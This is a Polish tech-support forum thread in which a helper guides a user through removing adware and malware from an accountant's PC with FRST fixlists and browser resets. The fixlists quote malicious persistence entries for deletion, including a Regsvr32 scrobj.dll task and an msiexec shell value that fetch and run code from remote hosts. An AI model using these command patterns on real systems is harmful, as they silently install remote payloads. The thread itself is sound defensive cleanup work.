Skocz do zawartości

Wirusy big_bang_empire i Big Farm. Bardzo proszę o pomoc


Rekomendowane odpowiedzi

Mam problem z wirusami, zainstalowały skróty na pulpicie i na pasku zadań, chrome zamyka się czasem samoczynnie, pojawił się drugi skrót do przeglądarki firefox.
Wcześniej Pani obsługująca komputer radziła sobie adwcleanerem i kasperskym z tym że ten drugi zawieszał się w trakcie skanowania. Dziś stwierdziła że miała wrażenie przejęcia kontroli przez kogoś innego nad komputerem - zamykanie przeglądarki, instalacja programów jak pisałem już powyżej.

 

Przy uruchomieniu FRST wyskakuje komunikat:
" Exception EAccesViolation in module ERUNT.exe at 00003A3E.
Acces violation at address 00403A3E in module 'ERUNT.exe'. Write of address 0076005D."
po kliknięciu OK wykonałem skan.

 

GMER - raport z safe mode, w normalnym trybie można było tylko zaznaczyć trzy ostatnie pola wyboru: usługi, rejestr i pliki oraz ADS, reszta pól była szara, nieaktywna.

 

Komputer używany przez Panią księgową jest na nim dużo programów - formatowanie dysku chciałbym wykonać tylko w ostateczności ponieważ boję się o utratę danych.
Bardzo proszę o pomoc oraz propozycję programu antywirusowego który mam kupić.
Dotacja przekazana ;)

 

czy pominąłem jakiś skan? jeśli coś braknie proszę o informację.
EDIT: Komputer jest potrzebny do pracy, nie chcę naciskać ale też czas coraz bardziej nagli...
Czy jest szansa na pomoc?
Czy można pracować na tym komputerze? Pani księgowa już się modli w intencji naprawy ;)

Addition.txt

FRST.txt

Shortcut.txt

gmer.txt

Edytowane przez kalama23
Łączę posty.
Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Księgowej współczuje, bo wykonywanie tego zawodu bez komputera to faktycznie udręka. Przepraszam, nie mogłem szybciej.

 

Nie powiem, że taki stan systemu to ja widzę niecodziennie, bo widzę nawet i kilka razy dziennie co prezentuje obraz sytuacji. Masa infekcji, prefabrykowane przeglądarki, adware zarażające skróty i wiele wiele więcej.

Myślę, że uporamy się z tym szybko. 

 

Do poczytania, obowiązkowo: KLIK. To uchroni Cię przed kolejną wizytą w tym dziale  :)

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) 
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Brak pliku
Task: {0659A980-3244-4202-929B-52EA5684F95D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8yNjRWMYYxMdVXMWk4MjYcRkVXFdhXRWMyN8F2OWQYRF== scrobj.dll
Task: {EF0F48A4-5D77-4EF5-9E10-B0316862B2DE} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () 
Task: {F435B3AD-8F34-47FC-8D19-7D1DC252A958} - System32\Tasks\{1F2A387E-0C8B-4A90-B544-ECB3A1B99015} => pcalua.exe -a C:\Users\Kasia\AppData\Local\Temp\jre-8u131-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 
RemoveDirectory: C:\Program Files (x86)\MIO
WMI_ActiveScriptEventConsumer_DellCommandPowerManagerAlertEventConsumer: 
WMI_ActiveScriptEventConsumer_DellCommandPowerManagerPolicyChangeEventConsumer: 
FirewallRules: [{43588AFA-371E-4EB2-809A-A7D0D9562A88}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe
FirewallRules: [{1750B21B-9C19-4DF6-B240-40EEDD753E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{6654B80F-3A65-4B3C-BEF2-F6D9096F8763}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Bagsarah
RemoveDirectory: C:\Users\Kasia\AppData\Local\Bagsarah
RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Bagsarah
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Kasia\AppData\Local\Firefox
RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Firefox
ShortcutWithArgument: C:\Users\Kasia\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap
ShortcutWithArgument: C:\Users\Kasia\AppData\Local\Bagsarah\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft WSE 3.0\WSE on the Web.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BigFarm.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://bigfarm.goodgamestudios.com/?w=239064}";
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://www.bigbangempire.com/?ref=281-000-000-005}";
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
Winlogon\Notify\ScCertProp: wlnotify.dll [X]
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Run: [GoogleChromeAutoLaunch_2ADBC5D4CA6B0A1DE744757424E6F2ED] => "C:\Program Files (x86)\Everness\Application\chrome.exe" --no-startup-window /prefetch:5
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Run: [background_fault] => C:\Users\Kasia\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8yNjRWMYYxMdVXMWk4MjYcRkVXFdhXRWMyN8F2OWQYRF== /q
RemoveDirectory: C:\Program Files (x86)\Everness
RemoveDirectory: C:\Users\Kasia\AppData\Local\Everness
RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Everness
C:\Users\Kasia\AppData\Local\background_fault\aswRD.exe
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=dspp&ts=1434916399&z=72c6d913177a99cde3b5acagaz6c6zat8gfq2c4t1z&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000 -> {1ACDEAF4-49DC-4E40-AA61-C4AF9D052B43} URL = 
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
R2 ANSARE; C:\Users\Kasia\AppData\Local\ANSARE\Snare.dll [826368 2017-05-08] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego]
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-09] (BIT.dll) [brak podpisu cyfrowego]
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [97280 2017-05-11] () [brak podpisu cyfrowego] 
S2 NPASRE; C:\Users\Kasia\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego]
R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego]
R2 VNASRE; C:\Users\Kasia\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego]
R2 WinSAPSvc; C:\Users\Kasia\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [brak podpisu cyfrowego] 
U3 pgddapod; \??\C:\Users\Kasia\AppData\Local\Temp\pgddapod.sys [X] 
C:\Users\Kasia\AppData\Local\ANSARE
C:\ProgramData\BIT
C:\Users\Kasia\AppData\Local\NPASRE
C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll 
C:\Users\Kasia\AppData\Local\VNASRE
C:\Users\Kasia\AppData\Roaming\WinSAPSvc
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Firefox.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\firefox — skrót.lnk
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin
  • Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji.
3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox:
  • Odłącz synchronizację (o ile włączona): KLIK.
  • Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
  • Menu Historia > Wyczyść historię przeglądania.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

bagsarah;everness;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

 

5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 

 

6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Jest dużo lepiej, wdrążam poprawki oraz kompelksowy skan przeciwwirusowy.

 

Myślę, że zbliżamy się do końca. 

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah
DeleteKey: HKEY_USERS\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Bagsarah
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness
DeleteKey: HKEY_USERS\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Everness
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku
2017-05-12 11:37 - 2017-05-12 12:29 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\33
2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-12 11:37 - 2017-05-12 11:37 - 00000000 _____ C:\Windows\SysWOW64\00
2017-04-27 14:22 - 2017-05-02 21:22 - 00000000 ____D C:\Program Files (x86)\BiaoJi
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

 

3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt.

Podsumuj również obecny stan systemu.

Odnośnik do komentarza
  • 3 tygodnie później...

Przepraszam, przeoczyłem.

 

EDIT 1: Panie Miszelu czy będziemy jeszcze działać czy to już koniec?
Bardzo proszę o polecenie oprogramowania zabezpieczającego - lada dzień skończy mi się okres testowy i będę musiał podjąć decyzję. Zależałoby mi na tym żeby był to wybór poparty wiedzą a nie reklamą więc jestem otwarty na sugestie.

 

EDIT 2: Nieśmiało przypominam o zakończeniu leczenia. Z góry bardzo dziękuję za zainteresowanie.

FRST.txt

Edytowane przez Rucek
Odnośnik do komentarza

Bardzo proszę o polecenie oprogramowania zabezpieczającego - lada dzień skończy mi się okres testowy i będę musiał podjąć decyzję. Zależałoby mi na tym żeby był to wybór poparty wiedzą a nie reklamą więc jestem otwarty na sugestie.

 

Na Twoim miejscu zostałbym na pokładzie z darmową wersją Avast. Ewentualnie do tego możesz dołożyć jakiś skaner na żądanie np. MBAM / KVRT / HitmanPro.

 


 

1. Zagrożenia wykryte przez Malwarebytes daj do usunięcia.

 

2. Skasuj poniższe skróty ręcznie:

 

C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk

C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk

C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk

 

3. Podsumuj obecny stan systemu.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...